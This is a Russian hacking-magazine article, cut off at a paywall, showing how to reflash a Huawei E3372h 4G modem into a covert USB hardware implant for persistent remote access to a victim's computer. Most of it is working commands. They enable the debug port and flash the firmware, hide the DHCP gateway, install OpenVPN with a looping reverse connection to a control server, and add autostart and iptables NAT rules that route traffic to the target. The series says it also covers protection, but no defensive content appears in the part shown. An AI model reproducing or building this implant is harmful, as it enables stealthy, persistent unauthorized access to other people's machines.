Ес­ли у зло­умыш­ленни­ка есть непос­редс­твен­ный дос­туп к компь­юте­ру потен­циаль­ной жер­твы, он может обес­печить себе пос­тоян­ный и бес­перебой­ный канал свя­зи. Про­ще все­го исполь­зовать для это­го обыч­ный USB-модем, который пред­варитель­но сле­дует слег­ка модифи­циро­вать. В этой статье мы под­робно рас­ска­жем и покажем как.

Что, если кто‑нибудь вос­поль­зует­ся оставлен­ным без вни­мания компь­юте­ром и под­клю­чит к нему спе­циаль­ный девайс, по которо­му затем получит уда­лен­ный дос­туп из любого угол­ка мира? Вся опи­сан­ная мною ранее ма­гия с эму­ляци­ей устрой­ств через USB может ока­зать­ся в рас­поряже­нии зло­умыш­ленни­ка. Толь­ко теперь он нап­равит уси­лия не на ата­ку, а на под­держа­ние уда­лен­ного дос­тупа.

info

Эта статья — часть серии пуб­ликаций о прак­тичес­ких при­емах взло­ма и атак с исполь­зовани­ем под­ручных устрой­ств, которые мож­но соб­рать дома. В этих матери­алах мы рас­кры­ваем прос­тые спо­собы получе­ния несан­кци­они­рован­ного дос­тупа к защищен­ной информа­ции и показы­ваем, как ее огра­дить от подоб­ных атак. Пре­дыду­щая статья серии: «Злая сетеву­ха. Раз­бира­ем в деталях ата­ку BadUSB-ETH».

За­думы­вал­ся ли ты о том, что сов­ремен­ные 4G-модемы (HiLink) — это устрой­ства чуть боль­ше флеш­ки с нас­тоящим Linux внут­ри? Нап­ример, Android 2.3 / Linux 3.4.5 + VxWorks v6.8 для GSM. Это пол­ностью авто­ном­ные устрой­ства с питани­ем по USB. Сра­зу пос­ле под­клю­чения к компь­юте­ру ОС модема за нес­коль­ко секунд заг­ружа­ется и эму­лиру­ет свой USB как сетевую кар­ту.

Для опи­сыва­емой в этой статье ата­ки луч­шим аппа­рат­ным решени­ем будет непос­редс­твен­но сам HiLink-модем: он ком­пактен и име­ет 4G-модуль. Это может быть, нап­ример, популяр­ный Huawei E3372h-153, который поз­воля­ет сде­лать переп­рошив­ку, к тому же у него богатая под­дер­жка сооб­щес­твом энту­зиас­тов.

Сов­ремен­ные 4G-модемы пред­став­ляют собой HiLink-модемы, то есть они опре­деля­ются в сис­теме как сетевая кар­та. Для ОС ПК поль­зовате­ля мак­сималь­но удоб­но вза­имо­дей­ство­вать с интерне­том через такую вир­туаль­ную Ethernet-сеть. Но в то же вре­мя и сам модем может исполь­зовать­ся для вза­имо­дей­ствия с компь­юте­ром, к которо­му он под­клю­чен. Внут­ри модема работа­ет пол­ноцен­ная ОС, которая так же, как было про­демонс­три­рова­но с BadUSB-ETH, эму­лиру­ет сетевую кар­ту. Схе­ма зак­репле­ния на ском­про­мети­рован­ной машине при помощи такого устрой­ства показа­на на сле­дующем рисун­ке.

Информационные потоки при закреплении по USB
Ин­форма­цион­ные потоки при зак­репле­нии по USB

Для зак­репле­ния в похожих обсто­ятель­ствах сущес­тву­ет готовый девайс под наз­вани­ем LAN Turtle, одна­ко он лишен важ­ной осо­бен­ности — под­дер­жки сто­рон­него 4G-канала.

 

Реализация

Са­мо устрой­ство нас­толь­ко удач­но под­ходит для орга­низа­ции уда­лен­ного дос­тупа, что понадо­бит­ся минимум изме­нений. Его глав­ные пре­иму­щес­тва:

  • не тре­бует допол­нитель­ного питания;
  • скры­тое под­клю­чение, устрой­ство не будет вид­но в локаль­ной сети, так как работа­ет толь­ко в пре­делах ском­про­мети­рован­ного компь­юте­ра;
  • ав­тоном­ный канал переда­чи дан­ных 4G поз­волит иметь дос­туп даже внут­ри изо­лиро­ван­ных локаль­ных сетей.

Для мак­сималь­ной эффектив­ности устрой­ство пот­ребу­ется нем­ного дорабо­тать — переп­рошить модем. Пос­ле всех вне­сен­ных изме­нений ОС модема авто­мати­чес­ки уста­новит VPN-соеди­нение с кон­троль­ным сер­вером через 4G-сеть (внеш­ний канал) и обес­печит таким обра­зом устой­чивый сетевой дос­туп к ПК, в который встав­лен модем. Изна­чаль­но получить дос­туп к ОС модема мож­но одним из сле­дующих спо­собов:

telnet 192.168.8.1
adb connect 192.168.8.1:5555

Что­бы выпол­нить даль­нейшие нас­трой­ки, пот­ребу­ется вклю­чить пор­ты для AT-команд:

curl http://192.168.8.1/html/switchDebugMode.html
minicom -D /dev/ttyUSB0

Пос­ле вклю­чения отла­доч­ного режима ОС модема может быть модифи­циро­вана, для это­го нуж­но вой­ти в режим переп­рошив­ки и заг­рузить откры­тую про­шив­ку:

at^godload # Переход в режим прошивки. Модем перезагрузится
sudo ./balong_flash -p /dev/ttyUSB0 E3372h-153_Update_22.200.15.00.00_M_AT_05.10_nv.exe

Пос­ле запус­ка модем обыч­но эму­лиру­ет CD-ROM с драй­верами плюс SD-кар­ту. Это нуж­но отклю­чить, пос­коль­ку девай­су тре­бует­ся толь­ко эму­ляция сети:

AT^NVWREX=50091,0,60,1 0 0 0 FF 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 A3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 # Не переходить в режим CD-ROM при запуске, включен RNDIS/CDC
AT^RESET # Перезагрузка

Да­лее сле­дует модифи­циро­вать сер­вер DHCP, что­бы модем не объ­являл себя шлю­зом и на компь­юте­ре не ломалась таб­лица мар­шру­тиза­ции. Модем дол­жен под­клю­чать­ся мак­сималь­но скрыт­но:

cat <<EE > /data/config
Interface br0
MinLease 30
Vendorid c0012
Address main
EnbSrv 1
Start 192.168.8.100
End 192.168.8.200
Option lease 86400
Option subnet 255.255.255.0
Address main end
EE

Те­перь нуж­но ско­пиро­вать на модем кли­ент OpenVPN с драй­вером и кон­фигом. Что­бы ничего не ком­пилиро­вать, готовые бинар­ники мож­но ска­чать с сай­та 4PDA:

adb push tun.ko /online/ovpn/
adb push openvpn /online/ovpn/
adb push vds.ovpn /online/ovpn/
cat <<EE > /data/vpn.sh
#!/system/bin/busybox sh
while :; do /online/ovpn/openvpn --config /online/ovpn/vds.ovpn --route-noexec; done
EE
chmod 700 /data/vpn.sh
busybox passwd
reboot

Для боль­шей надеж­ности обратно­го под­клю­чения VPN луч­ше запус­кать в бес­конеч­ном цик­ле. Оста­лось лишь нас­тро­ить авто­запуск все­го это­го доб­ра и не забыть орга­низо­вать мар­шру­тиза­цию пакетов через модем от 4G-сети в сто­рону целево­го компь­юте­ра:

mount -o remount,rw /dev/block/mtdblock16
cat <<EE >> /system/etc/autorun.sh
/data/autorun.sh &
EE
cat <<EE > /data/autorun.sh
#!/system/bin/busybox sh
killall dhcps.real
cp /data/config /var/dhcp/dhcps/config
dhcps.real &
sleep 5
insmod /online/ovpn/tun.ko
/data/vpn.sh &
iptables -t nat -A POSTROUTING -o br0 -s 172.16.0.0/24 -j MASQUERADE
iptables -I INPUT 1 -i br0 -p tcp --dport 80 -j DROP
iptables -I FORWARD 2 -i br0 -o wan0 -j DROP
EE
chmod 700 /data/autorun.sh

Так­же на модеме зап­рещен выход в 4G-интернет с ПК и прик­рыта веб‑админка. Теперь модем пол­ностью «заряжен» и готов к исполь­зованию в качес­тве аппа­рат­ной зак­ладки.

 

Закрепление

Продолжение доступно только участникам

Вариант 1. Присоединись к сообществу «Xakep.ru», чтобы читать все материалы на сайте

Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», позволит скачивать выпуски в PDF, отключит рекламу на сайте и увеличит личную накопительную скидку! Подробнее

Вариант 2. Открой один материал

Заинтересовала статья, но нет возможности стать членом клуба «Xakep.ru»? Тогда этот вариант для тебя! Обрати внимание: этот способ подходит только для статей, опубликованных более двух месяцев назад.


  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии